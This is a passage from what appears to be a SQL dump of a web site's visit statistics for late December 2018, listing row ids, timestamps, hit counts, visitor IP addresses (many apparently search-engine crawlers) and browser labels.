178.89','firefox'),(359759,1545930850,1,1,0,0,'54.36.148.248','other'),(359760,1545931091,1,1,0,0,'54.36.148.133','other'),(359761,1545931188,2,2,0,0,'207.46.13.103','other'),(359762,1545931486,1,1,0,0,'141.8.142.103','other'),(359763,1545931489,1,1,0,0,'5.45.207.19','other'),(359764,1545931577,1,1,0,0,'54.36.148.103','other'),(359765,1545931645,1,1,0,0,'212.55.88.12','chrome'),(359766,1545931663,1,1,0,0,'54.36.148.190','other'),(359767,1545931698,1,1,0,0,'54.36.148.171','other'),(359768,1545931801,1,1,0,0,'178.154.244.11','other'),(359769,1545931965,1,1,0,0,'54.36.149.32','other'),(359770,1545931993,1,1,0,0,'54.36.149.84','other'),(359771,1545932103,1,1,0,0,'54.36.149.76','other'),(359772,1545932298,1,1,0,0,'46.229.168.152','other'),(359773,1545932318,1,1,0,0,'95.163.255.106','other'),(359774,1545932449,1,1,0,0,'54.36.149.36','other'),(359775,1545932515,1,1,0,0,'95.108.213.4','other'),(359776,1545932626,1,1,0,0,'207.46.13.103','other'),(359777,1545932643,1,1,0,0,'54.36.149.104','other'),(359778,1545932651,1,1,0,0,'95.163.255.107','other'),(359779,1545932746,1,1,0,0,'8.29.198.25','other'),(359780,1545932876,1,1,0,0,'46.229.168.137','other'),(359781,1545932889,1,1,0,0,'54.36.149.86','other'),(359782,1545932891,1,1,0,0,'54.36.148.117','other'),(359783,1545932893,2,2,0,0,'178.154.244.11','other'),(359784,1545932906,1,1,0,0,'46.229.168.140','other'),(359785,1545932909,8,8,0,0,'216.244.66.241','other'),(359786,1545933278,1,1,0,0,'66.249.66.156','chrome'),(359787,1545933282,1,1,0,0,'54.36.148.177','other'),(359788,1545933464,2,2,0,0,'87.250.224.118','other'),(359789,1545933469,1,1,0,0,'54.36.148.63','other'),(359790,1545933479,1,1,0,0,'54.36.148.192','other'),(359791,1545933667,1,1,0,0,'54.36.148.64','other'),(359792,1545933722,2,2,0,0,'193.19.254.172','chrome'),(359793,1545933820,1,1,0,0,'141.8.183.23','other'),(359794,1545933844,1,1,0,0,'8.29.198.27','other'),(359795,1545933879,1,1,0,0,'141.8.142.103','other'),(359796,1545933884,2,2,0,0,'216.244.66.241','other'),(359797,1545934175,1,1,0,0,'46.229.168.134','other'),(359798,1545934242,1,1,0,0,'178.154.200.48','other'),(359799,1545934245,1,1,0,0,'178.154.244.49','other'),(359800,1545934277,1,1,0,0,'54.36.148.131','other'),(359801,1545934330,1,1,0,0,'94.231.182.30','chrome'),(359802,1545934344,1,1,0,0,'87.250.224.47','other'),(359803,1545934565,1,1,0,0,'40.77.167.73','other'),(359804,1545934618,1,1,0,0,'66.249.66.152','chrome'),(359805,1545934781,1,1,0,0,'91.196.178.164','chrome'),(359806,1545934907,2,2,0,0,'91.196.178.133','firefox'),(359807,1545935022,1,1,0,0,'54.36.148.167','other'),(359808,1545935068,1,1,0,0,'54.36.148.118','other'),(359809,1545935242,1,1,0,0,'213.180.203.9','other'),(359810,1545935260,1,1,0,0,'54.36.148.88','other'),(359811,1545935452,1,1,0,0,'5.188.210.53','chrome'),(359812,1545935456,1,1,0,0,'46.229.168.133','other'),(359813,1545935572,1,1,0,0,'54.36.148.57','other'),(359814,1545935580,1,1,0,0,'54.36.148.134','other'),(359815,1545935696,1,1,0,0,'54.36.148.68','other'),(359816,1545935736,4,4,0,0,'216.244.66.241','other'),(359817,1545935787,2,2,0,0,'91.196.178.189','chrome'),(359818,1545936144,1,1,0,0,'207.46.13.103','other'),(359819,1545936224,1,1,0,0,'54.36.148.149','other'),(359820,1545936261,1,1,0,0,'40.77.167.73','other'),(359821,1545936324,1,1,0,0,'54.36.149.76','other'),(359822,1545936388,1,1,0,0,'54.36.148.82','other'),(359823,1545936631,1,1,0,0,'54.36.148.129','other'),(359824,1545936648,1,1,0,0,'46.229.168.135','other'),(359825,1545936650,1,1,0,0,'46.229.168.154','other'),(359826,1545936740,1,1,0,0,'54.36.148.32','other'),(359827,1545936769,1,1,0,0,'54.36.148.79','other'),(359828,1545936886,1,1,0,0,'141.8.142.191','other'),(359829,1545936895,1,1,0,0,'54.36.149.17','other'),(359830,1545936944,1,1,0,0,'54.36.149.103','other'),(359831,1545936950,1,1,0,0,'141.8.132.16','other'),(359832,1545937133,1,1,0,0,'216.244.66.241','other'),(359833,1545937161,1,1,0,0,'213.180.203.40','other'),(359834,1545937332,1,1,0,0,'213.180.203.17','other'),(359835,1545937449,1,1,0,0,'66.249.66.42','chrome'),(359836,1545937462,2,2,0,0,'141.8.142.108','other'),(359837,1545937629,1,1,0,0,'54.36.149.93','other'),(359838,1545937675,1,1,0,0,'178.154.171.27','other'),(359839,1545937702,1,1,0,0,'46.229.168.151','other'),(359840,1545937763,1,1,0,0,'54.36.149.36','other'),(359841,1545937790,1,1,0,0,'54.36.148.37','other'),(359842,1545937800,1,1,0,0,'207.46.13.99','other'),(359843,1545938004,1,1,0,0,'5.45.207.8','other'),(359844,1545938035,1,1,0,0,'87.250.224.47','other'),(359845,1545938051,1,1,0,0,'141.8.142.144','other'),(359846,1545938068,2,2,0,0,'46.229.168.148','other'),(359847,1545938101,1,1,0,0,'37.9.113.103','other'),(359848,1545938218,1,1,0,0,'141.8.183.23','other'),(359849,1545938221,1,1,0,0,'213.180.203.53','other'),(359850,1545938267,2,2,0,0,'178.154.244.11','other'),(359851,1545938418,1,1,0,0,'178.154.171.24','other'),(359852,1545938439,1,1,0,0,'5.255.253.38','other'),(359853,1545938513,1,1,0,0,'178.154.244.65','other'),(359854,1545938570,8,8,0,0,'216.244.66.241','other'),(359855,1545938592,2,2,0,0,'5.45.207.19','other'),(359856,1545938654,1,1,0,0,'54.36.148.146','other'),(359857,1545938762,1,1,0,0,'5.45.207.79','other'),(359858,1545938782,1,1,0,0,'54.36.148.51','other'),(359859,1545938802,1,1,0,0,'54.36.148.52','other'),(359860,1545938822,1,1,0,0,'141.8.142.191','other'),(359861,1545938967,1,1,0,0,'54.36.148.122','other'),(359862,1545939008,1,1,0,0,'54.36.149.8','other'),(359863,1545939166,1,1,0,0,'46.229.168.151','other'),(359864,1545939168,1,1,0,0,'46.229.168.154','other'),(359865,1545939227,1,1,0,0,'66.249.66.44','chrome'),(359866,1545939401,5,5,0,0,'178.154.244.11','other'),(359867,1545939456,1,1,0,0,'37.9.113.148','other'),(359868,1545939942,2,2,0,0,'216.244.66.241','other'),(359869,1545939999,2,2,0,0,'5.45.207.79','other'),(359870,1545940171,1,1,0,0,'46.229.168.150','other'),(359871,1545940461,1,1,0,0,'46.229.168.133','other'),(359872,1545940488,1,1,0,0,'54.36.149.52','other'),(359873,1545940523,1,1,0,0,'54.36.149.76','other'),(359874,1545940594,1,1,0,0,'178.154.244.11','other'),(359875,1545940632,1,1,0,0,'54.36.148.156','other'),(359876,1545940774,1,1,0,0,'54.36.148.35','other'),(359877,1545940904,1,1,0,0,'54.36.148.157','other'),(359878,1545940914,2,2,0,0,'54.36.148.163','other'),(359879,1545941124,1,1,0,0,'54.36.148.238','other'),(359880,1545941171,1,1,0,0,'95.108.213.4','other'),(359881,1545941317,5,5,0,0,'216.244.66.241','other'),(359882,1545941492,1,1,0,0,'178.154.200.48','other'),(359883,1545941514,1,1,0,0,'141.8.132.16','other'),(359884,1545941545,1,1,0,0,'5.45.207.19','other'),(359885,1545941588,1,1,0,0,'54.36.149.10','other'),(359886,1545941665,1,1,0,0,'54.36.148.205','other'),(359887,1545941838,1,1,0,0,'54.36.148.158','other'),(359888,1545941956,1,1,0,0,'54.36.148.166','other'),(359889,1545942049,1,1,0,0,'54.36.148.48','other'),(359890,1545942291,1,1,0,0,'54.36.148.114','other'),(359891,1545942542,1,1,0,0,'54.36.148.120','other'),(359892,1545942671,2,2,0,0,'40.77.167.73','other'),(359893,1545942799,1,1,0,0,'54.36.149.42','other'),(359894,1545942813,1,1,0,0,'54.36.148.183','other'),(359895,1545943033,1,1,0,0,'54.36.149.75','other'),(359896,1545943035,1,1,0,0,'216.244.66.241','other'),(359897,1545943070,1,1,0,0,'46.229.168.129','other'),(359898,1545943083,1,1,0,0,'54.36.149.51','other'),(359899,1545943284,1,1,0,0,'87.250.224.118','other'),(359900,1545943404,2,2,0,0,'54.36.148.65','other'),(359901,1545943560,1,1,0,0,'95.108.181.75','other'),(359902,1545943579,1,1,0,0,'8.29.198.26','other'),(359903,1545943609,1,1,0,0,'37.9.113.103','other'),(359904,1545943649,1,1,0,0,'141.8.132.16','other'),(359905,1545943779,2,2,0,0,'207.46.13.103','other'),(359906,1545943801,1,1,0,0,'54.36.148.15','other'),(359907,1545943824,1,1,0,0,'5.45.207.19','other'),(359908,1545944105,3,3,0,0,'216.244.66.241','other'),(359909,1545944160,1,1,0,0,'54.36.148.91','other'),(359910,1545944166,1,1,0,0,'54.36.149.15','other'),(359911,1545944202,1,1,0,0,'46.229.168.154','other'),(359912,1545944410,3,3,0,0,'207.46.13.99','other'),(359913,1545944561,1,1,0,0,'5.45.207.79','other'),(359914,1545944602,1,1,0,0,'46.229.168.129','other'),(359915,1545944619,1,1,0,0,'66.249.66.156','chrome'),(359916,1545944684,1,1,0,0,'8.29.198.25','other'),(359917,1545944980,1,1,0,0,'46.229.168.137','other'),(359918,1545945047,1,1,0,0,'40.77.167.24','other'),(359919,1545945224,1,1,0,0,'216.244.66.241','other'),(359920,1545945307,1,1,0,0,'66.249.66.155','chrome'),(359922,1545945341,1,1,0,0,'46.229.168.134','other'),(359923,1545945667,1,1,0,0,'54.36.149.36','other'),(359924,1545945711,1,1,0,0,'54.36.148.45','other'),(359925,1545945792,1,1,0,0,'54.36.149.23','other'),(359926,1545945798,1,1,0,0,'54.36.148.36','other'),(359927,1545945859,1,1,0,0,'207.46.13.103','other'),(359928,1545945982,1,1,0,0,'66.249.66.57','chrome'),(359929,1545945983,1,1,0,0,'66.249.66.42','chrome'),(359930,1545946063,1,1,0,0,'54.36.149.63','other'),(359931,1545946101,1,1,0,0,'54.36.148.224','other'),(359932,1545946186,1,1,0,0,'82.145.209.87','other'),(359933,1545946273,1,1,0,0,'46.211.9.70','chrome'),(359934,1545946366,2,2,0,0,'87.250.224.118','other'),(359935,1545946432,1,1,0,0,'37.9.113.103','other'),(359936,1545946634,1,1,0,0,'141.8.132.16','other'),(359937,1545946643,4,4,0,0,'95.108.213.4','other'),(359938,1545946676,1,1,0,0,'54.36.148.221','other'),(359939,1545946753,1,1,0,0,'213.180.203.53','other'),(359940,1545946759,1,1,0,0,'54.36.148.109','other'),(359941,1545946799,1,1,0,0,'54.36.148.84','other'),(359942,1545946822,2,2,0,0,'5.255.253.38','other'),(359943,1545946825,1,1,0,0,'178.154.200.8','other'),(359944,1545946880,1,1,0,0,'87.250.224.47','other'),(359945,1545946945,5,5,0,0,'216.244.66.241','other'),(359946,1545946993,1,1,0,0,'141.8.183.22','other'),(359947,1545947100,2,2,0,0,'213.180.203.17','other'),(359948,1545947110,1,1,0,0,'178.154.171.17','other'),(359949,1545947207,1,1,0,0,'141.8.142.103','other'),(359950,1545947248,1,1,0,0,'141.8.183.23','other'),(359951,1545947256,1,1,0,0,'66.249.66.155','chrome'),(359952,1545947257,1,1,0,0,'66.249.66.154','chrome'),(359953,1545947352,1,1,0,0,'5.45.207.79','other'),(359954,1545947367,1,1,0,0,'54.36.148.187','other'),(359955,1545947542,1,1,0,0,'195.62.62.247','chrome'),(359956,1545947544,2,2,0,0,'37.9.113.20','other'),(359957,1545947570,1,1,0,0,'46.229.168.135','other'),(359958,1545947681,1,1,0,0,'141.8.132.16','other'),(359959,1545947994,2,2,0,0,'5.45.207.19','other'),(359960,1545948009,1,1,0,0,'54.36.149.36','other'),(359961,1545948031,1,1,0,0,'54.36.148.100','other'),(359962,1545948104,1,1,0,0,'209.17.97.18','other'),(359963,1545948130,1,1,0,0,'54.36.148.190','other'),(359964,1545948137,1,1,0,0,'213.180.203.40','other'),(359965,1545948169,2,2,0,0,'91.196.178.42','chrome'),(359966,1545948188,1,1,0,0,'66.249.66.152','chrome'),(359967,1545948241,1,1,0,0,'213.180.203.53','other'),(359968,1545948249,1,1,0,0,'95.163.255.158','other'),(359969,1545948251,1,1,0,0,'95.163.255.165','other'),(359970,1545948472,1,1,0,0,'54.36.148.107','other'),(359971,1545948566,1,1,0,0,'37.9.113.20','other'),(359972,1545948651,1,1,0,0,'54.36.148.42','other'),(359973,1545948691,1,1,0,0,'54.36.149.51','other'),(359974,1545948708,1,1,0,0,'216.244.66.241','other'),(359975,1545948753,1,1,0,0,'66.249.66.155','chrome'),(359976,1545948977,1,1,0,0,'54.36.148.221','other'),(359977,1545949142,1,1,0,0,'54.36.148.20','other'),(359978,1545949313,1,1,0,0,'46.229.168.147','other'),(359979,1545949409,1,1,0,0,'54.36.148.132','other'),(359980,1545949696,1,1,0,0,'54.36.148.209','other'),(359981,1545949731,1,1,0,0,'207.46.13.103','other'),(359982,1545949860,1,1,0,0,'54.36.149.80','other'),(359983,1545949881,1,1,0,0,'54.36.148.23','other'),(359984,1545949951,4,4,0,0,'216.244.66.241','other'),(359985,1545950073,1,1,0,0,'54.36.148.167','other'),(359986,1545950256,1,1,0,0,'54.36.149.48','other'),(359987,1545950334,1,1,0,0,'54.36.149.70','other'),(359988,1545950378,1,1,0,0,'54.36.149.92','other'),(359989,1545950848,1,1,0,0,'54.36.148.155','other'),(359990,1545951163,1,1,0,0,'54.36.148.199','other'),(359991,1545951729,1,1,0,0,'54.36.148.237','other'),(359992,1545952006,1,1,0,0,'46.229.168.135','other'),(359993,1545952008,1,1,0,0,'46.229.168.130','other'),(359994,1545952176,1,1,0,0,'54.36.148.252','other'),(359995,1545952768,2,2,0,0,'216.244.66.241','other'),(359996,1545952832,1,1,0,0,'54.36.148.90','other'),(359997,1545952835,1,1,0,0,'40.77.167.116','other'),(359998,1545952874,1,1,0,0,'54.36.148.196','other'),(359999,1545953074,1,1,0,0,'66.249.66.156','chrome'),(360000,1545953146,1,1,0,0,'95.163.255.64','other'),(360001,1545953149,1,1,0,0,'95.163.255.68','other'),(360002,1545953177,1,1,0,0,'54.36.148.59','other'),(360003,1545953384,1,1,0,0,'54.36.148.206','other'),(360004,1545953393,1,1,0,0,'54.36.149.48','other'),(360005,1545953429,1,1,0,0,'40.77.167.24','other'),(360006,1545953544,1,1,0,0,'54.36.149.53','other'),(360007,1545953624,1,1,0,0,'180.76.15.148','other'),(360008,1545953625,1,1,0,0,'180.76.15.154','other'),(360009,1545953654,1,1,0,0,'46.229.168.145','other'),(360010,1545953873,1,1,0,0,'54.36.148.45','other'),(360011,1545954043,2,2,0,0,'40.77.167.73','other'),(360012,1545954106,1,1,0,0,'40.77.167.28','other'),(360013,1545954126,1,1,0,0,'54.36.149.33','other'),(360014,1545954299,1,1,0,0,'54.36.148.198','other'),(360015,1545954379,1,1,0,0,'216.244.66.241','other'),(360016,1545954415,1,1,0,0,'8.29.198.25','other'),(360017,1545954669,1,1,0,0,'46.229.168.129','other'),(360018,1545954803,1,1,0,0,'54.36.149.27','other'),(360019,1545954860,1,1,0,0,'39.104.21.226','other'),(360020,1545954875,1,1,0,0,'54.36.149.73','other'),(360021,1545955179,1,1,0,0,'54.36.149.86','other'),(360022,1545955204,1,1,0,0,'54.36.148.76','other'),(360023,1545955211,1,1,0,0,'54.36.148.224','other'),(360024,1545955323,1,1,0,0,'54.36.148.122','other'),(360025,1545955393,1,1,0,0,'54.36.148.242','other'),(360026,1545955455,1,1,0,0,'66.249.66.40','chrome'),(360027,1545955483,8,8,0,0,'216.244.66.241','other'),(360028,1545955518,1,1,0,0,'8.29.198.25','other'),(360029,1545955557,1,1,0,0,'54.36.148.34','other'),(360030,1545955625,1,1,0,0,'180.76.15.157','other'),(360031,1545955645,1,1,0,0,'54.36.148.160','other'),(360032,1545956078,1,1,0,0,'66.249.66.154','chrome'),(360033,1545956326,1,1,0,0,'54.36.149.66','other'),(360034,1545956440,1,1,0,0,'54.36.148.87','other'),(360035,1545956689,1,1,0,0,'54.36.148.36','other'),(360036,1545956765,1,1,0,0,'54.36.148.167','other'),(360037,1545956864,1,1,0,0,'54.36.148.192','other'),(360038,1545956947,1,1,0,0,'216.244.66.241','other'),(360039,1545957082,1,1,0,0,'54.36.148.147','other'),(360040,1545957140,1,1,0,0,'51.255.65.46','other'),(360041,1545957248,1,1,0,0,'54.36.149.40','other'),(360042,1545957249,1,1,0,0,'66.249.66.157','chrome'),(360043,1545957250,1,1,0,0,'66.249.66.152','chrome'),(360044,1545957322,1,1,0,0,'54.36.148.78','other'),(360045,1545957785,1,1,0,0,'54.36.148.106','other'),(360046,1545957946,1,1,0,0,'54.36.149.70','other'),(360047,1545958427,5,5,0,0,'216.244.66.241','other'),(360048,1545958601,1,1,0,0,'46.229.168.129','other'),(360049,1545958622,1,1,0,0,'51.15.235.211','other'),(360050,1545958790,1,1,0,0,'54.36.148.156','other'),(360051,1545958858,1,1,0,0,'5.45.207.79','other'),(360054,1545958859,1,1,0,0,'178.154.244.11','other'),(360055,1545958870,1,1,0,0,'54.36.148.227','other'),(360056,1545958952,1,1,0,0,'87.250.224.47','other'),(360057,1545958994,1,1,0,0,'54.36.148.209','other'),(360058,1545959034,1,1,0,0,'66.249.66.152','chrome'),(360059,1545959090,1,1,0,0,'54.36.148.116','other'),(360060,1545959264,1,1,0,0,'46.229.168.154','other'),(360061,1545959284,1,1,0,0,'54.36.149.40','other'),(360062,1545959453,1,1,0,0,'54.36.149.51','other'),(360063,1545959480,1,1,0,0,'54.36.149.13','other'),(360064,1545959564,1,1,0,0,'54.36.148.50','other'),(360065,1545959599,1,1,0,0,'54.36.148.38','other'),(360066,1545959628,1,1,0,0,'54.36.149.76','other'),(360067,1545959845,1,1,0,0,'157.55.39.86','other'),(360068,1545960083,1,1,0,0,'46.229.168.134','other'),(360069,1545960174,1,1,0,0,'54.36.148.138','other'),(360070,1545960238,1,1,0,0,'54.36.149.38','other'),(360071,1545960309,1,1,0,0,'54.36.148.76','other'),(360072,1545960374,1,1,0,0,'66.249.66.156','chrome'),(360073,1545960386,5,5,0,0,'216.244.66.241','other'),(360074,1545960622,1,1,0,0,'54.36.148.209','other'),(360075,1545960701,1,1,0,0,'54.36.148.38','other'),(360076,1545960819,1,1,0,0,'54.36.148.65','other'),(360077,1545960893,1,1,0,0,'54.36.148.16','other'),(360078,1545961043,2,2,0,0,'46.229.168.151','other'),(360079,1545961135,1,1,0,0,'54.36.148.139','other'),(360080,1545961304,2,2,0,0,'216.244.66.241','other'),(360081,1545961335,1,1,0,0,'54.36.148.143','other'),(360082,1545961390,1,1,0,0,'54.36.149.51','other'),(360083,1545961492,2,2,0,0,'40.77.167.73','other'),(360084,1545961587,1,1,0,0,'54.36.148.253','other'),(360085,1545961614,1,1,0,0,'54.36.149.77','other'),(360086,1545961710,1,1,0,0,'54.36.148.116','other'),(360087,1545961882,1,1,0,0,'46.229.168.133','other'),(360088,1545961938,1,1,0,0,'54.36.148.11','other'),(360089,1545961966,1,1,0,0,'54.36.148.63','other'),(360090,1545962057,1,1,0,0,'54.36.148.168','other'),(360091,1545962077,1,1,0,0,'54.36.148.134','other'),(360092,1545962197,1,1,0,0,'54.36.148.222','other'),(360093,1545962233,1,1,0,0,'54.36.148.106','other'),(360094,1545962241,3,3,0,0,'216.244.66.241','other'),(360095,1545962288,1,1,0,0,'54.36.149.94','other'),(360096,1545962437,1,1,0,0,'54.36.149.50','other'),(360097,1545962512,3,3,0,0,'5.45.207.19','other'),(360099,1545962538,1,1,0,0,'46.229.168.137','other'),(360100,1545962540,1,1,0,0,'46.229.168.140','other'),(360101,1545962584,1,1,0,0,'54.36.148.198','other'),(360102,1545962588,1,1,0,0,'87.250.224.47','other'),(360103,1545962593,1,1,0,0,'54.36.148.212','other'),(360104,1545962648,1,1,0,0,'207.46.13.221','other'),(360105,1545962688,1,1,0,0,'54.36.149.12','other'),(360106,1545962873,1,1,0,0,'37.9.113.148','other'),(360107,1545962910,1,1,0,0,'87.250.224.64','other'),(360108,1545962946,1,1,0,0,'54.36.148.14','other'),(360109,1545963025,1,1,0,0,'37.9.113.103','other'),(360110,1545963082,1,1,0,0,'95.108.181.57','other'),(360111,1545963116,1,1,0,0,'213.180.203.9','other'),(360112,1545963127,1,1,0,0,'87.250.224.118','other'),(360113,1545963156,1,1,0,0,'141.8.142.144','other'),(360114,1545963173,1,1,0,0,'37.9.113.20','other'),(360115,1545963253,1,1,0,0,'5.45.207.79','other'),(360116,1545963304,1,1,0,0,'178.154.200.48','other'),(360117,1545963310,1,1,0,0,'5.255.253.38','other'),(360118,1545963359,1,1,0,0,'54.36.148.208','other'),(360119,1545963366,1,1,0,0,'178.154.244.11','other'),(360120,1545963367,1,1,0,0,'95.108.213.4','other'),(360121,1545963437,1,1,0,0,'180.76.15.146','other'),(360122,1545963438,1,1,0,0,'180.76.15.156','other'),(360123,1545963511,1,1,0,0,'54.36.149.27','other'),(360124,1545963762,1,1,0,0,'54.36.149.7','other'),(360125,1545964013,6,6,0,0,'216.244.66.241','other'),(360126,1545964045,1,1,0,0,'54.36.149.98','other'),(360127,1545964078,1,1,0,0,'54.36.148.246','other'),(360128,1545964080,1,1,0,0,'46.229.168.136','other'),(360129,1545964148,1,1,0,0,'54.36.148.137','other'),(360130,1545964218,1,1,0,0,'5.45.207.79','other'),(360131,1545964395,2,2,0,0,'185.163.46.23','chrome'),(360132,1545965202,1,1,0,0,'54.36.149.66','other'),(360133,1545965246,1,1,0,0,'46.229.168.154','other'),(360134,1545965248,1,1,0,0,'8.29.198.25','other'),(360135,1545965253,1,1,0,0,'54.36.149.43','other'),(360136,1545965742,1,1,0,0,'66.249.66.156','chrome'),(360137,1545965766,1,1,0,0,'178.154.171.27','other'),(360138,1545965784,2,2,0,0,'54.36.148.51','other'),(360139,1545965960,1,1,0,0,'54.36.149.78','other'),(360140,1545965989,1,1,0,0,'54.36.149.83','other'),(360141,1545965992,1,1,0,0,'54.36.149.99','other'),(360142,1545966037,1,1,0,0,'54.36.148.236','other'),(360143,1545966351,1,1,0,0,'8.29.198.26','other'),(360144,1545966425,1,1,0,0,'54.36.148.39','other'),(360145,1545966692,1,1,0,0,'46.229.168.134','other'),(360146,1545966728,1,1,0,0,'128.69.228.163','msie'),(360147,1545966732,1,1,0,0,'46.229.168.140','other'),(360148,1545966756,1,1,0,0,'54.36.148.163','other'),(360149,1545966851,3,3,0,0,'216.244.66.241','other'),(360150,1545966968,1,1,0,0,'54.36.149.21','other'),(360151,1545967051,1,1,0,0,'54.36.149.19','other'),(360152,1545967578,1,1,0,0,'54.36.149.76','other'),(360153,1545967761,1,1,0,0,'54.36.149.14','other'),(360154,1545967888,1,1,0,0,'54.36.148.134','other'),(360155,1545967912,1,1,0,0,'54.36.148.163','other'),(360156,1545968115,1,1,0,0,'46.229.168.132','other'),(360157,1545968157,2,2,0,0,'216.244.66.241','other'),(360158,1545968181,1,1,0,0,'54.36.148.215','other'),(360159,1545968271,1,1,0,0,'54.36.149.46','other'),(360160,1545968339,2,2,0,0,'178.133.104.68','chrome'),(360161,1545968533,1,1,0,0,'54.36.148.200','other'),(360162,1545968535,1,1,0,0,'54.36.148.174','other'),(360163,1545968538,1,1,0,0,'46.229.168.138','other'),(360164,1545968680,1,1,0,0,'54.36.148.127','other'),(360165,1545968845,1,1,0,0,'54.36.149.9','other'),(360166,1545969000,3,3,0,0,'60.191.38.77','firefox'),(360167,1545969206,1,1,0,0,'46.229.168.130','other'),(360168,1545969257,1,1,0,0,'54.36.148.97','other'),(360169,1545969406,1,1,0,0,'54.36.148.73','other'),(360170,1545969749,1,1,0,0,'40.77.167.153','other'),(360171,1545969774,1,1,0,0,'54.36.149.46','other'),(360172,1545969779,4,4,0,0,'216.244.66.241','other'),(360173,1545969799,1,1,0,0,'54.36.148.223','other'),(360174,1545970129,1,1,0,0,'54.36.148.13','other'),(360175,1545970133,1,1,0,0,'54.36.149.64','other'),(360176,1545970140,3,3,0,0,'95.108.213.4','other'),(360177,1545970356,3,3,0,0,'5.45.207.79','other'),(360178,1545970444,3,3,0,0,'178.154.244.11','other'),(360179,1545970477,1,1,0,0,'54.36.148.228','other'),(360180,1545970614,1,1,0,0,'5.45.207.19','other'),(360181,1545970713,1,1,0,0,'54.36.149.99','other'),(360182,1545970895,1,1,0,0,'54.36.149.45','other'),(360183,1545970945,1,1,0,0,'54.36.149.65','other'),(360184,1545971009,1,1,0,0,'87.250.224.47','other'),(360185,1545971157,1,1,0,0,'37.9.113.103','other'),(360186,1545971241,1,1,0,0,'40.77.167.153','other'),(360187,1545971278,1,1,0,0,'216.244.66.241','other'),(360188,1545971319,1,1,0,0,'54.36.148.253','other'),(360189,1545971336,1,1,0,0,'54.36.148.188','other'),(360190,1545971357,2,2,0,0,'178.154.244.11','other'),(360191,1545971370,1,1,0,0,'141.8.142.103','other'),(360192,1545971424,1,1,0,0,'5.45.207.79','other'),(360193,1545971471,1,1,0,0,'46.229.168.138','other'),(360194,1545971668,1,1,0,0,'54.36.148.52','other'),(360195,1545971866,1,1,0,0,'54.36.149.61','other'),(360196,1545971930,1,1,0,0,'54.36.148.123','other'),(360197,1545971968,1,1,0,0,'66.249.66.154','chrome'),(360198,1545972114,2,2,0,0,'207.46.13.5','other'),(360199,1545972172,1,1,0,0,'207.46.13.221','other'),(360200,1545972258,1,1,0,0,'178.154.244.11','other'),(360201,1545972485,1,1,0,0,'54.36.149.85','other'),(360202,1545972618,6,6,0,0,'216.244.66.241','other'),(360203,1545972689,1,1,0,0,'54.36.148.212','other'),(360204,1545972756,1,1,0,0,'46.229.168.138','other'),(360205,1545972758,1,1,0,0,'46.229.168.129','other'),(360206,1545972782,1,1,0,0,'54.36.148.190','other'),(360207,1545972817,2,2,0,0,'35.166.152.78','chrome'),(360208,1545972823,1,1,0,0,'54.36.148.26','other'),(360209,1545972879,1,1,0,0,'54.36.148.120','other'),(360210,1545973160,1,1,0,0,'54.36.148.106','other'),(360211,1545973307,1,1,0,0,'54.36.148.150','other'),(360212,1545973517,1,1,0,0,'46.229.168.150','other'),(360213,1545973605,1,1,0,0,'54.36.149.34','other'),(360214,1545973762,1,1,0,0,'54.36.148.249','other'),(360215,1545973928,1,1,0,0,'54.36.148.142','other'),(360216,1545973961,1,1,0,0,'54.36.149.90','other'),(360217,1545973984,2,2,0,0,'216.244.66.241','other'),(360218,1545974051,1,1,0,0,'46.229.168.136','other'),(360219,1545974137,1,1,0,0,'54.36.148.252','other'),(360220,1545974606,1,1,0,0,'54.36.148.196','other'),(360221,1545974896,1,1,0,0,'54.36.149.9','other'),(360222,1545975210,1,1,0,0,'54.36.148.179','other'),(360223,1545975308,1,1,0,0,'195.201.171.107','firefox'),(360224,1545975411,1,1,0,0,'54.36.148.78','other'),(360225,1545975512,2,2,0,0,'216.244.66.241','other'),(360226,1545975528,1,1,0,0,'54.36.148.157','other'),(360227,1545975744,1,1,0,0,'54.36.149.75','other'),(360228,1545976027,1,1,0,0,'46.229.168.139','other'),(360229,1545976083,1,1,0,0,'8.29.198.27','other'),(360230,1545976335,1,1,0,0,'54.36.149.65','other'),(360231,1545976529,1,1,0,0,'66.249.66.40','chrome'),(360232,1545976627,1,1,0,0,'176.113.170.104','chrome'),(360233,1545976649,1,1,0,0,'54.36.148.144','other'),(360234,1545976751,1,1,0,0,'54.36.148.106','other'),(360235,1545976758,138,138,0,0,'176.9.146.84','other'),(360236,1545976759,2,2,0,0,'216.244.66.241','other'),(360237,1545976799,1,1,0,0,'54.36.148.35','other'),(360238,1545977098,1,1,0,0,'54.36.148.129','other'),(360239,1545977109,1,1,0,0,'40.77.167.136','other'),(360240,1545977181,1,1,0,0,'8.29.198.26','other'),(360241,1545977544,1,1,0,0,'54.36.149.2','other'),(360242,1545977684,1,1,0,0,'46.229.168.143','other'),(360243,1545977685,1,1,0,0,'46.229.168.135','other'),(360244,1545977733,1,1,0,0,'54.36.148.37','other'),(360245,1545977779,1,1,0,0,'163.172.67.180','other'),(360246,1545977780,1,1,0,0,'178.63.97.34','other'),(360247,1545977810,1,1,0,0,'66.249.66.156','chrome'),(360248,1545977882,1,1,0,0,'54.36.148.173','other'),(360249,1545978091,1,1,0,0,'54.36.149.29','other'),(360250,1545978131,1,1,0,0,'46.229.168.147','other'),(360251,1545978251,5,5,0,0,'216.244.66.241','other'),(360252,1545978257,2,2,0,0,'40.77.167.91','other'),(360253,1545978616,1,1,0,0,'54.36.149.68','other'),(360254,1545978947,1,1,0,0,'54.36.148.127','other'),(360255,1545979049,1,1,0,0,'46.229.168.143','other'),(360256,1545979141,1,1,0,0,'54.36.149.71','other'),(360257,1545979181,1,1,0,0,'54.36.148.242','other'),(360258,1545979349,1,1,0,0,'54.36.149.48','other'),(360259,1545979399,1,1,0,0,'54.36.148.249','other'),(360260,1545979628,1,1,0,0,'54.36.148.141','other'),(360261,1545979764,3,3,0,0,'178.154.244.11','other'),(360262,1545979835,1,1,0,0,'95.108.213.4','other'),(360263,1545979973,1,1,0,0,'87.250.224.46','other'),(360264,1545979977,1,1,0,0,'141.8.142.74','other'),(360265,1545979978,1,1,0,0,'54.36.148.156','other'),(360266,1545980087,1,1,0,0,'54.36.148.200','other'),(360267,1545980111,1,1,0,0,'141.8.142.103','other'),(360268,1545980238,1,1,0,0,'5.45.207.79','other'),(360269,1545980244,1,1,0,0,'54.36.148.176','other'),(360270,1545980287,1,1,0,0,'54.36.149.100','other'),(360271,1545980385,4,4,0,0,'5.45.207.19','other'),(360272,1545980418,1,1,0,0,'54.36.148.82','other'),(360273,1545980452,1,1,0,0,'54.36.148.30','other'),(360275,1545980463,1,1,0,0,'54.36.148.86','other'),(360276,1545980571,1,1,0,0,'54.36.148.246','other'),(360277,1545980630,1,1,0,0,'54.36.149.47','other'),(360278,15459